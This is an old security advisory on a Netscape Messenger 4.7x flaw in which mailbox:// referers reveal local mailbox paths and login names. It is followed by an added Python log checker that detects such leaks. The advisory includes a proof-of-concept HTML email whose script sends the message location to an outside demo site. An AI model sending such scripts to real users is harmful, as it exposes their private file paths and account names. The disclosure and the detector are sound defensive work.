Vulnerability

    Netscape Messenger

Affected

    Netscape 4.7x, all platforms

Description

    '3APA3A' found the following. There are known bugs in Netscape whose
    exploitation requires knowing where the user's files are located.
    This bug is not a serious one by itself, but it allows that location
    to be obtained.

    Netscape Messenger uses an internal protocol called mailbox://. The
    format of a mailbox URI is

        mailbox://full_path_to_user_folder?ID=some_message_id&number=somenumber

    This URI contains the full path to the user's mailbox, which usually
    contains the user's login name and, in the case of Windows 9x, the
    path to the Netscape installation.

    It is impossible to determine this location from JavaScript inside
    an e-mail message, because Netscape hides document.location from
    JavaScript. It is, however, possible to retrieve the mailbox:// URI
    of the message, and with it the mailbox location, the user's system
    login and in some cases the path to the Netscape installation.

    When a link is invoked from a message, Netscape sets the
    "document.referrer" property to the URI of the message that contained
    the link. JavaScript on the target page is able to retrieve this
    property and pass it to any location together with the IP of the
    calling machine.

    If you read this message with Netscape Messenger you can simply
    click the reference

        http://www.security.nnov.ru/files/nsdemo.asp

    to see your mailbox location, or you can force a Netscape user to
    open this page with a message like this:

        From: 3APA3A
        To: 3APA3A
        Subject: Test your Netscape
        Content-Type: text/html

        <html><script>
        window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
        </script>
        <A HREF="http://www.security.nnov.ru/files/nsdemo.asp">
        http://www.security.nnov.ru/files/nsdemo.asp</A>
        </html>

    This vulnerability only affects the user's local (on the client
    machine) mailbox. If a user keeps his mail on an IMAP server, the
    referer will show up as an IMAP:// URL.

Solution

    Netscape was contacted on May 30, 2001. No feedback was given.

    Workaround: Don't use POP3, and keep your mail on an IMAP server.
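
The following is an added example, not part of the original advisory: a log check that flags clients whose requests disclose a mailbox:// URI, either in the Referer header or URL-encoded in the request target, as described above. It assumes Combined Log Format; the function name, sample log lines, addresses and paths are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: the proxy or web server writes Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"')
# URI format from the advisory: mailbox://full_path?ID=...&number=...
MAILBOX_RE = re.compile(r'mailbox:/+(?P<path>[^?]*)', re.I)

# Constructed sample lines: documentation addresses, invented paths.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/May/2001:10:00:00 +0000] "GET /page.asp HTTP/1.0" 200 512 '
    '"mailbox://C|/Program Files/Netscape/Users/alice/Mail/Inbox?ID=1&number=2" "Mozilla/4.76"',
    '192.0.2.11 - - [30/May/2001:10:00:05 +0000] "GET /page.asp HTTP/1.0" 200 512 '
    '"imap://mail.example.test/INBOX" "Mozilla/4.76"',
    '192.0.2.12 - - [30/May/2001:10:00:09 +0000] "GET '
    '/page.asp?mailbox%3A///home/bob/nsmail/Inbox%3FID%3D1%26number%3D2 HTTP/1.0" 200 512 "-" "Mozilla/4.76"',
]


def find_mailbox_leaks(lines):
    """Report requests that disclose a local mailbox:// URI."""
    findings = []
    for line in lines:
        entry = LOG_RE.match(line)
        if not entry:
            continue
        parts = entry.group("request").split(" ")
        target = parts[1] if len(parts) > 1 else ""
        # The URI can arrive in the Referer header or escape()d in the URL.
        for where, value in (("referer", entry.group("referer")), ("url", target)):
            hit = MAILBOX_RE.search(unquote(value))
            if hit:
                path = hit.group("path")
                findings.append({
                    "client": entry.group("client"),
                    "where": where,
                    "leaked_path": path,
                    # A drive letter marks a Windows path in the leaked URI.
                    "windows_drive": bool(re.match(r"[A-Za-z][|:]", path)),
                })
    return findings


if __name__ == "__main__":
    for finding in find_mailbox_leaks(SAMPLE_LOG):
        print(finding)
```

The IMAP sample line is not flagged, matching the advisory's note that IMAP-stored mail produces an IMAP:// referer rather than a local path.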